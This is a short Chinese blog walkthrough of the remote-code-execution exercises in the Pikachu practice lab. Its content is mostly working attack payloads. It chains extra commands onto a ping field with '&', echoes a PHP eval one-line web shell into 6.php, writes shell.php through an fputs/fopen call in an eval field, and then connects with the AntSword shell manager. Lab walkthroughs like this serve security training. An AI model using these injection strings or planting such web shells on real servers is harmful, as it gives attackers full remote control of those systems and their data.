Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
苹果醋34 分钟前
数据库索引设计:在 MongoDB 中创建高效索引的策略
java·运维·spring boot·mysql·nginx
XMYX-020 分钟前
Linux 物理机如何区分 SSD 与 HDD ——以 DELL PERC H730 Mini 为例
linux·运维
行思理40 分钟前
linux 安全与防护,全方向讲解
linux·安全·github
深盾安全1 小时前
Flutter框架编译Android程序全攻略:从入门到进阶
安全
房屋安全鉴定检测1 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
心 一1 小时前
Web安全基石:深入理解与防御SQL注入漏洞
sql·安全·web安全
yongui478342 小时前
CentOS系统如何查看当前内存容量
linux·运维·centos
xzq_java2 小时前
CentOS操作系统虚拟机安装以及连接工具下载和远程连接工具远程连接
linux·运维·centos
房屋安全鉴定检测3 小时前
房屋安全鉴定需要什么条件
安全·网络安全
Sweety丶╮7943 小时前
【Ansible】实施 Ansible Playbook知识点
服务器·云原生·ansible
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!02UV安装并设置国内源032025年数学建模国赛C题超详细解题思路04不再让Windows更新!&Edge游戏助手卸载及关闭自动更新05A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程06KGG转MP3工具|非KGM文件|解密音频072025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定08UV 工具安装与国内镜像源配置指南09教你如何认证 Gemini 教育优惠的二次验证,薅个 1年的 Gemini Pro 会员10解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题